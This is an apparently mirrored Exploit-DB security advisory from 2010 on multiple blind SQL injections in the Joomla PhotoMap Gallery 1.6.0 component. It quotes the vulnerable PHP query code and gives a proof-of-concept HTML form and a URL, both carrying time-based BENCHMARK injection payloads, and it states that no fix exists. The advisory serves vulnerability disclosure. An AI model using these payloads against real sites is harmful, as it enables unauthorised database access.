Joomla! Component com_photomapgallery 1.6.0 – Multiple Blind SQL Injections - 体验盒子

作者： Salvatore Fresta
日期： 2010-07-28
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/14495/
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection

 NamePhotoMap Gallery
 Vendorhttp://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658
 Versions Affected 1.6.0

 AuthorSalvatore Fresta aka Drosophila
 Website http://www.salvatorefresta.net
 Contact salvatorefresta [at] gmail [dot] com
 Date2010-07-28

X. INDEX

 I.ABOUT THE APPLICATION
 II. DESCRIPTION
 III.ANALYSIS
 IV. SAMPLE CODE
 V.FIX
 

I. ABOUT THE APPLICATION
________________________

PhotoMap Galleryisa gallerycomponentcompletely
integratedintoJoomla 1.5.x. Like 'Picasa', 'Flickr',
or 'Panoramio',youcaneasilyadd geo-tagsto your
photossothatyou can remember exactly where they're
from using Google Maps.


II. DESCRIPTION
_______________

Some parametersare not properly sanitised before being
used in SQL queries.


III. ANALYSIS
_____________

Summary: 

A) Multiple Blind SQL Injection
_______________________________

The parameter id passed to controller.phpvia POST when
view is set to user and task is set to save_usercategory
isnotproperly sanitisedbefore beingused in a SQL
query. Thiscanbe exploited to manipulate SQL queries
by injecting arbitrary SQL code.

The parameter folder passed toimagehandler.phpis not
properly sanitised before used in a SQL query.This can
beexploitedtomanipulateSQLqueries by injecting
arbitrary SQL code.

The following is the affected code.

controller.php (line 1135):

function save_usercategory() {

// Check for request forgeries
	JRequest::checkToken() or jexit( 'Invalid Token' );
		
	$user			= & JFactory::getUser();
	$task			= JRequest::getVar('task');
	$post 			= JRequest::get('post');

	//perform access checks
	$isNew = ($post['id']) ? false : true;

//	$catid = (int) JRequest::getVar('catid', 0);
		
	$db 	=& JFactory::getDBO();
	$query = 'SELECT c.id, c.directory'
				. ' FROM #__g_categories AS c'
				. ' WHERE c.id = '.$post['id'];


imagehandler.php (line 109);

function getList() {

	static $list;

	// Only process the list once per request
	if (is_array($list)) {
		return $list;
	}

	// Get folder from request
	$folder = $this->getState('folder');
	$search = $this->getState('search');

	$query = 'SELECT *'
			. ' FROM #__g_categories'
			. ' WHERE id = '.$folder;



IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

Replace 89eb36eca1919aff534b13b54796c9a4 with your own.

<html>
	<head>
	<title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title>
	</head>
	<body>
	<form method="POST" action="http://127.0.0.1/joomla/index.php">
	<input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1">
			<input type="hidden" name="option" value="com_photomapgallery">
			<input type="hidden" name="controller" value="">
			<input type="hidden" name="view" value="user">
		<input type="hidden" name="task" value="save_usercategory">
		<input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))">
		<input type="submit">
	</form>
	</body>
</html>


http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))


V. FIX
______

No fix.